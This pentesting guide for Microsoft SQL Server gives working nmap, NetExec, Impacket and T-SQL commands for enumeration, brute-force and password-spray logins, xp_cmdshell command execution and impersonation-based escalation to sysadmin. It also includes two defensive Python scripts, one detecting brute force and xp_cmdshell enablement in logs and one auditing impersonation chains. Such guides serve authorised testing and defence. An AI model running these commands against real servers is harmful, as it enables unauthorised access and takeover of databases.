MSSQL
Pentesting MSSQL - TCP Port 1433
Theory
Microsoft SQL Server (MSSQL) is a relational database management system developed by Microsoft. By default, it listens on TCP port 1433.
Default MS-SQL system databases:
master Database: Records all the system-level information for an instance of SQL Server.
msdb Database: Is used by SQL Server Agent for scheduling alerts and jobs.
model Database: Is used as the template for all databases created on the instance of SQL Server. Modifications made to the model database, such as database size, collation, recovery model, and other database options, are applied to any databases created afterwards.
Resource Database: Is a read-only database that contains system objects that are included with SQL Server. System objects are physically persisted in the Resource database, but they logically appear in the sys schema of every database.
tempdb Database: Is a workspace for holding temporary objects or intermediate result sets.
Practice
Enumerate
Using nmap scripts, we can enumerate the version and configuration of the SQL Server instance.
# Useful scripts
nmap --script ms-sql-info -p 1433 <target-ip>
nmap --script ms-sql-config -p 1433 <target-ip>
nmap --script ms-sql-empty-password,ms-sql-xp-cmdshell -p 1433 <target-ip>
nmap --script "ms-sql-*" -p 1433 <target-ip>
# Run all Scripts
nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 <IP>
Enumerate DB Objects
To enumerate databases, tables, columns, users and permissions, refer to the following page:
Enum Databases
Brute Force Credentials
If you don't have credentials you can try to guess them. You can use nmap or metasploit. Be careful: you can lock out accounts if you fail to log in several times with an existing username.
Using NetExec, we may bruteforce MSSQL credentials.
# Bruteforce (tries every user/password combination; add --no-bruteforce to pair the two files line by line instead)
nxc mssql <TARGET> -u <userfile> -p <passwordfile>
# Password-Spray (one password against the whole user list)
nxc mssql <TARGET> -u <userfile> -p <password> --continue-on-success
Sign-in
Using mssqlclient from Impacket, we can log in to an MSSQL instance.
#Classic login
mssqlclient.py -port 1433 DOMAIN/username:password@<target-ip>
#Use Windows Authentication (forces NTLM authentication)
mssqlclient.py -port 1433 DOMAIN/username:password@<target-ip> -windows-auth
#Use Kerberos
mssqlclient.py -k DC1.DOMAIN.LOCAL
Remote Code Execution
Tools like NetExec can be used to execute OS commands from MSSQL.
# Execute commands using xp_cmdshell
netexec mssql <TARGET> -d <DOMAIN> -u <USER> -p <PASSWORD> -x "whoami"
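Both the credential guessing described under Brute Force Credentials and the xp_cmdshell execution NetExec performs here leave traces in the SQL Server ERRORLOG: every failed login is written as a "Login failed for user '...'" line with the client address, and enabling xp_cmdshell through sp_configure writes a "Configuration option 'xp_cmdshell' changed from 0 to 1" line. The script below is an added example for the defender's side; it is not part of this page nor of NetExec or any other tool mentioned here. It parses constructed ERRORLOG lines, flags client addresses whose failure pattern looks like brute force (many attempts against one or two logins) or password spraying (one or two attempts across many logins), and reports any watched sp_configure option being switched on. The log lines, addresses, usernames and the five-failure threshold are constructed for illustration.

```python
import re
from collections import defaultdict

# Constructed sample lines in the SQL Server ERRORLOG format (not captured from a real host).
SAMPLE_ERRORLOG = """\
2024-05-01 09:00:01.10 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 10.10.14.5]
2024-05-01 09:00:01.30 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 10.10.14.5]
2024-05-01 09:00:01.50 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 10.10.14.5]
2024-05-01 09:00:01.70 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 10.10.14.5]
2024-05-01 09:00:01.90 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 10.10.14.5]
2024-05-01 09:00:02.10 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 10.10.14.5]
2024-05-01 09:00:05.00 Logon       Login failed for user 'alice'. Reason: Password did not match that for the login provided. [CLIENT: 10.10.14.9]
2024-05-01 09:00:05.20 Logon       Login failed for user 'bob'. Reason: Could not find a login matching the name provided. [CLIENT: 10.10.14.9]
2024-05-01 09:00:05.40 Logon       Login failed for user 'carol'. Reason: Password did not match that for the login provided. [CLIENT: 10.10.14.9]
2024-05-01 09:00:05.60 Logon       Login failed for user 'dave'. Reason: Password did not match that for the login provided. [CLIENT: 10.10.14.9]
2024-05-01 09:00:05.80 Logon       Login failed for user 'eve'. Reason: Could not find a login matching the name provided. [CLIENT: 10.10.14.9]
2024-05-01 09:01:00.00 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 10.10.14.20]
2024-05-01 09:05:00.00 spid55      Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
2024-05-01 09:05:00.10 spid55      Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
"""

# "Login failed for user '<name>'. Reason: ... [CLIENT: <ip>]" as written by the Logon source.
LOGIN_FAILED = re.compile(
    r"Login failed for user '(?P<user>[^']*)'\. Reason: (?P<reason>.*?) \[CLIENT: (?P<client>[^\]]+)\]"
)
# "Configuration option '<name>' changed from <old> to <new>." as written when sp_configure runs.
CONFIG_CHANGE = re.compile(
    r"Configuration option '(?P<option>[^']+)' changed from (?P<old>\d+) to (?P<new>\d+)"
)
# sp_configure options whose enablement turns the database engine into a code-execution host.
WATCHED_OPTIONS = {"xp_cmdshell", "Ole Automation Procedures", "Ad Hoc Distributed Queries"}


def parse_login_failures(errorlog: str) -> list:
    """Return (user, reason, client) for every failed-login line in the log text."""
    failures = []
    for line in errorlog.splitlines():
        m = LOGIN_FAILED.search(line)
        if m:
            failures.append((m["user"], m["reason"], m["client"]))
    return failures


def classify_clients(failures, threshold: int = 5) -> dict:
    """Group failures by source address and label each client that reached the threshold.

    "password-spray": at least three distinct logins tried from the same address.
    "brute-force":   repeated failures concentrated on one or two logins.
    Clients below the threshold are not reported (constructed heuristic, tune per environment).
    """
    per_client = defaultdict(lambda: {"failures": 0, "users": set()})
    for user, _reason, client in failures:
        per_client[client]["failures"] += 1
        per_client[client]["users"].add(user)

    flagged = {}
    for client, stats in per_client.items():
        if stats["failures"] < threshold:
            continue
        pattern = "password-spray" if len(stats["users"]) >= 3 else "brute-force"
        flagged[client] = {
            "failures": stats["failures"],
            "users": sorted(stats["users"]),
            "pattern": pattern,
        }
    return flagged


def dangerous_config_changes(errorlog: str) -> list:
    """Return (option, new_value) for watched sp_configure options switched on (new value 1)."""
    hits = []
    for line in errorlog.splitlines():
        m = CONFIG_CHANGE.search(line)
        if m and m["option"] in WATCHED_OPTIONS and m["new"] == "1":
            hits.append((m["option"], m["new"]))
    return hits


if __name__ == "__main__":
    for client, info in classify_clients(parse_login_failures(SAMPLE_ERRORLOG)).items():
        print(f"{client}: {info['pattern']} ({info['failures']} failures, logins={info['users']})")
    for option, value in dangerous_config_changes(SAMPLE_ERRORLOG):
        print(f"config change: {option} -> {value}")
```

On a real host the same messages can be read from the ERRORLOG file under the instance's Log directory, or through the SQL Server Audit feature if it is configured; the "show advanced options" change is deliberately left out of the watched set because it is a normal prerequisite for many benign configuration changes, while xp_cmdshell, Ole Automation Procedures and Ad Hoc Distributed Queries being switched on outside a change window is worth an alert on its own.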
Local Code Execution
To locally execute/read/write files on an MSSQL instance, see the following page:
Read/Write/Execute
Coerced Auths (Stealing NTLM Hash)
On MS-SQL (Microsoft SQL) servers, the EXEC method can be used to access a remote SMB share. MSSQL uses Kerberos to authenticate users, so we can retrieve the NTLM hash.
Living off the land
MSSQL Privilege Escalation
SQL Server has a special permission, named IMPERSONATE, that allows the executing user to take on the permissions of another user or login until the context is reset or the session ends.
UNIX-Like
From a UNIX-like host, using NetExec, we can enumerate impersonation privileges and escalate as follows:
# Enumerate PrivEsc vectors
nxc mssql <TARGET> -u <USER> -p <PASSWORD> -M mssql_priv
# Impersonate PrivEsc
nxc mssql <TARGET> -u <USER> -p <PASSWORD> -M mssql_priv -o ACTION=privesc
# Rollback sysadmin privs
nxc mssql <TARGET> -u <USER> -p <PASSWORD> -M mssql_priv -o ACTION=rollback
Windows
To enumerate users that you can impersonate, run the following query:
-- Find users you can impersonate
SELECT DISTINCT b.name
FROM sys.server_permissions a
INNER JOIN sys.server_principals b
ON a.grantor_principal_id = b.principal_id
WHERE a.permission_name = 'IMPERSONATE'
-- Check whether "sa" or any other highly privileged user is listed
We may also use mssqlclient from Impacket to enumerate users that we can impersonate
SQL (dbo@ScrambleHR)> enum_impersonate
If you can impersonate a user, even if that user isn't sysadmin, you should check whether the user has access to other databases or linked servers.
-- Impersonate the sa login
EXECUTE AS LOGIN = 'sa'
SELECT SYSTEM_USER
SELECT IS_SRVROLEMEMBER('sysadmin')
Note that once you are sysadmin you can impersonate any other one:
-- Impersonate RegUser
EXECUTE AS LOGIN = 'RegUser'
-- Verify you are now running as the RegUser login
SELECT SYSTEM_USER
SELECT IS_SRVROLEMEMBER('sysadmin')
-- Change back to sa
REVERT
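The query above shows only a single hop, but IMPERSONATE grants chain: a login that can EXECUTE AS a second login inherits that login's own grants, and a sysadmin login can impersonate anyone, so the real question for an audit is which non-sysadmin logins can reach sysadmin through some chain of grants. The Python script below is an added example, not part of this page or of Impacket or NetExec; it takes rows shaped like the query's output (grantee login, login it may impersonate), builds the impersonation graph and reports the shortest EXECUTE AS chain from each login to a sysadmin login. The grants, login names and the sysadmin set are constructed for illustration.

```python
from collections import deque

# Constructed audit rows: (grantee login, login it holds IMPERSONATE on).
# Not taken from a real instance.
IMPERSONATE_GRANTS = [
    ("webapp", "reporting"),
    ("reporting", "dbbackup"),
    ("dbbackup", "sa"),
    ("auditor", "readonly"),
]
# Constructed set of logins that are members of the sysadmin fixed server role.
SYSADMIN_LOGINS = {"sa", "DOMAIN\\sqladmins"}


def build_graph(grants):
    """Adjacency map: login -> set of logins it can EXECUTE AS LOGIN."""
    graph = {}
    for grantee, target in grants:
        graph.setdefault(grantee, set()).add(target)
        graph.setdefault(target, set())
    return graph


def impersonation_paths(graph, sysadmins):
    """For every login, the shortest EXECUTE AS chain ending at a sysadmin login, or None.

    Sysadmin logins are returned as a one-element path: they need no grant at all,
    which is why a chain may stop at the first sysadmin it reaches.
    """
    results = {}
    for start in graph:
        if start in sysadmins:
            results[start] = [start]
            continue
        # Breadth-first search over IMPERSONATE edges; sorted() keeps the output deterministic.
        queue = deque([[start]])
        seen = {start}
        found = None
        while queue and found is None:
            path = queue.popleft()
            for nxt in sorted(graph.get(path[-1], ())):
                if nxt in seen:
                    continue
                if nxt in sysadmins:
                    found = path + [nxt]
                    break
                seen.add(nxt)
                queue.append(path + [nxt])
        results[start] = found
    return results


def escalation_report(grants, sysadmins):
    """Non-sysadmin logins that can reach sysadmin, each with its impersonation chain."""
    graph = build_graph(grants)
    return {
        login: path
        for login, path in impersonation_paths(graph, sysadmins).items()
        if path is not None and login not in sysadmins
    }


if __name__ == "__main__":
    for login, chain in escalation_report(IMPERSONATE_GRANTS, SYSADMIN_LOGINS).items():
        print(f"{login}: " + " -> ".join(chain))
```

Every login the report lists holds an effective path to sysadmin even though the IMPERSONATE query above would show, for webapp, only the harmless-looking reporting login; the fix is to revoke the grant that closes the chain (here the grant on sa held by dbbackup) rather than the first hop.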
Local Privilege Escalation
The account running the MSSQL service will usually have the SeImpersonatePrivilege token privilege enabled. You will probably be able to escalate to Administrator or NT AUTHORITY\SYSTEM by following this page:
Abusing Tokens
Linked SQL Servers Abuse
Linked servers are typically configured to enable the database engine to execute a Transact-SQL statement that includes tables in another instance of SQL Server, or another database product such as Oracle.
From a UNIX-like machine, we can enumerate linked SQL Servers using mssqlclient.py or MSSqlPwner.
# mssqlclient.py
mssqlclient.py -port 1433 <DOMAIN>/<USERNAME>:<PASSWORD>@<TARGET>
SQL (dbo@master)> enum_links
# MSSqlPwner
mssqlpwner <DOMAIN>/<USER>:<PASSWORD>@<TARGET> -windows-auth get-link-server-list